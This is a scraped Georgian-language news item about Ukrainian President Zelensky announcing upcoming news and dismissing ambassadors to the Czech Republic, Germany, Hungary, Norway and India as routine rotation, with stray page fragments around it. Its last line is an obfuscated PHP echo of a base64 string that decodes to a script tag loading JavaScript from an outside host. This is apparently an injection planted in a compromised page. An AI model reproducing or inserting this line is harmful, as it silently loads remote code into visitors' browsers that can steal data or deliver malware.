celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ შემდგომ კვირას მნიშვნელოვანი ამბების გავრცელება დააანონსა, მათ შორის ხელისუფლების მხრიდანაც. ამის შესახებ უკრაინის პირველმა პირმა გავცელებულ ვიდეომიმართვაში ისაუბრა.
 
„უკვე ვემზადები ახალი კვირისთვის - იქნება მნიშვნელოვანი ახალი ამბები, მათ შორის სახელისუფლებო მაღალჩინოსნებისგან“,- განაცხადა ზელენსკიმ.
 
ამასთან, პრეზიდენტმა რამდენიმე ქვეყანაში ელჩების გათავისუფლების საკითხიც განმარტა.
 
„ეს როტაციის საკითხია - დიპლომატიური პრაქტიკის ჩვეულებრივი ნაწილი. ჩეხეთში, გერმანიაში, უნგრეთში, ნორვეგიასა და ინდოეთში დაინიშნებიან უკრაინის ახალი წარმომადგენლები. კანდიდატების მომზადება საგარეო საქმეთა სამინისტროს მეშვეობით მიმდინარეობს“,- განაცხადა ზელენსკიმ.
 
ცნობისთვის, დღეს უკრაინის პრეზიდენტმა 5 ქვეყანაში საგანგებო და სრულუფლებიანი ეჩები თანამდებობიდან გაათავისუფლა.
611
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");